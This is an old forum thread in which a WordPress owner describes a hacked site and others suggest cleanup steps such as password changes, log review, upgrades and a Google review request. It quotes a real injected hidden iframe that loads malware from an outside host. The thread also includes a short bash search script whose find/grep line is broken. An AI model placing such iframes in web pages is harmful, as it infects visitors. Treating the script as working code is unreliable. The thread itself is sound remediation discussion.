wordpress site hacked!

Hi!

My site greatsayings.net has been hacked few days back. Now, i have install a fresh wordpress files and the ftp password has been changed a few times!
At the moment , the site seems to be working without any problem.

Before, whener i try to open my site , my antivirus was detecting a virus.. downloaded from my site !

Here is the details !

8/5/2009 7:15:08 AM SYSTEM 180 Sign of "HTML:Iframe-inf" has been found in "http://www.greatsayings.net/\{gzip}" file.

the index files alos got the following extra codes

<iframe src="http://buyl.in:8080/index.php" width=176 height=185 style="visibility: hidden"></iframe>


Please advice me what to do , how to remove this badware !!!

Thanks in advance !

 

I have the same problem can anyone help?

 

Remove the 777 from your folders.

 

all my file attributes are correct ..... any suggestion ..

 

Change your FTP usernames and password. If you'd like I can whip up a quick script to remove all these. Contact your host and ask them for the ftp logs for these particular files. Odds are they were downloaded and within a few seconds uploaded infected. You're right, though, permissions have nothing to do with the mass occurrence of these issues with :8080 vn, in, etc... injections.

 

Can you anyone plz recheck whther my site is still infected or not ..... i want to submit a review to google
also .. how do i check if my site is still infected or not ?
Anybody plz ...

 

Malicious software is hosted on 1 domain(s), including xi3.ru/

Find a line including that domain in your files or search for iframes. If you'd like, email it to me and I'll write you a quick script to get rid of them.

 

In addition to cleanup of the pages or database, your WordPress 2.8.3 is out of date and needs to be upgraded. You have quite a few plug-ins, and all those should be checked for possible upgrade or removal, too.

http://wordpress.org/download
http://secunia.com/advisories/product/6745/?task=advisories

 

SecureCp...I read above that you could write a script to remove iframes. We have about 10 sites affected...Not at all funny. I am at my wits end at the moment. Have been searching everywhere for a solution. Could you pls. explain more about the process above to remove the iframes...I have started to remove them manually 1 at a time from 1 site and more seem to appear/or be present in other files if that makes sense. This problem seems to be very widespread at the moment...Regards and Thank you for any assistance you can offer.

 

#!/bin/bash

echo -e "Please input the url you wish to search for."

read -a word

echo "Selected: ${word[0]}"

find . -name '*.php' -exec grep ${word[0]} > ${word[0]}

Code (markup):

You will need shell access to the server(s) your sites are on to use this script. Imo if you can't work out how to run a bash script you shouldn't be running wordpress. I'm sorry for using an array but this was part of another project i was working on, i just stripped it down to simplify it.

 

The above is a great tool, however not 100%. The majority of the time when these injections occur they come encoded and cut and screwed. what google tells you is xo7.ru or xxxxxx.cn may not look like it within your code. It's will look, much more hmmmm, cryptic. again, if anyone needs it provide me an index page, or any other which has been hit, and I'll be glad to build a custom script for you. I already have quite a few built, with a list of 10-15 of the most common. if you're google 'infected' page has a domain mentioned as malware, odds are I already have one.

 

I know it's horrible

Was a quick hack-up from an old script i was using to security audit my php for vuln functions. When you put something together to scan for custom modifications make sure you post it! I'd be interested to see

Just a thought, be pretty easy to grep for base64 and etc. It's very rare i've seen a legitimate script base64'd but i see it all the time when somebodies trying to obsfucate their malicious code. I might make a project out of this \o/

 

You'd be surprised how many things to include base64 by default. I believe WP and WHMCS to name a few, well, the most common. Find me an infected site, provide me an index file, and away I can go with the code to show you for example. I'm just here to help.

 

Still stuck with this F### Malware ... .. what if i change the hosting / same database with new / latest wordpress files and plugins ... will the malware be still present in my site ?

Plz help !

 

i have check all my sites ( www.greatsayings.net / funnytopjokes.info / / /) with www.spybye.org
the results are clean ... is my site still infected with the malwares ,... should i submit for a review to google now ?
Plz guide me !

 

anyone plzzz

 

Anybody out there ..... Need your help !

 

http://www.google.com/safebrowsing/diagnostic?site=http://www.greatsayings.net/

The site is still listed as suspicious, but it's been a long time since malware was found. Have you requested a review at webmaster tools?

Google Webmaster Tools
http://www.google.com/webmasters/

If this still isn't resolved, see my signature for articles that will help. There are links to places like UnmaskParasites , Dasient, and Web-Sniffer where you can scan your site for malware and view the source code of your pages as others see it.

Also, if this still isn't resolved, can you please describe all of the steps you have already taken, so that people don't have to suggest doing things you've already done?

 

Thanks Steve !
Here is what i have done so far ...
1.scan the site with spybye.org.
2. change the ftp password / database/mysql password
3. Delete all the plugins/ wp files and replace with the latest files..
4. before iframes were there in all index.php files .... they are no more at the moment ....as far as i know ...
5. before Antivirus software AVAST used to detect the iframes / malware.. when i open my sites .. but now no more but when i try to open my sites .. it gives an error ...
6.Scan my sites for malware presence with http://wam.dasient.com/wam/

It seems my sites are still infected ...

Please suggest / help ///

What if i change the hosting account ... will it work / will it solve my problem ?... is this malware in the database ...? Plz advice !

 

Go to your cPanel > Raw Access Logs. Turn on logon archiving, and download your latest FTP access log. Examine it to see if people other than you are transferring files into your site by FTP.

Get an antivirus program different from the one you're using now. You can go to one of the free online sites like Trend HouseCall. Do a complete system scan, on your PC, not the website. Many, many web sites are hacked because the administrator's PC has spyware on it that is stealing the FTP password. Do a web search on "gumblar" to find out how this happens. When the password is stolen this way, it doesn't matter whether it was strong or not. Most of these administrators thought they were safe because they were running antivirus software, but it was a free one like AVG, and the virus got past it. I haven't seen many complaints about Avast, but still, this time use a different one.

Then change your FTP password again.

File a support ticket with your web host, and tell them what has happened.

cPanel > phpMyAdmin provides a way to browse your database tables to look for suspicious code. During this time when you're just looking, all you have to do is be careful not to change or save anything. Because the iframes were in your index files, I suspect you won't find any bad code in the database, anyway, but it's worth taking a look.

If you haven't requested a review at Google webmaster tools, go ahead and do it. The last time they found suspicious content was August 4, which was a very long time ago, especially since they visited the site on the 21st (yesterday) and apparently did not find suspicious content.

Be sure to request a "review", not a "reconsideration". They're two different things.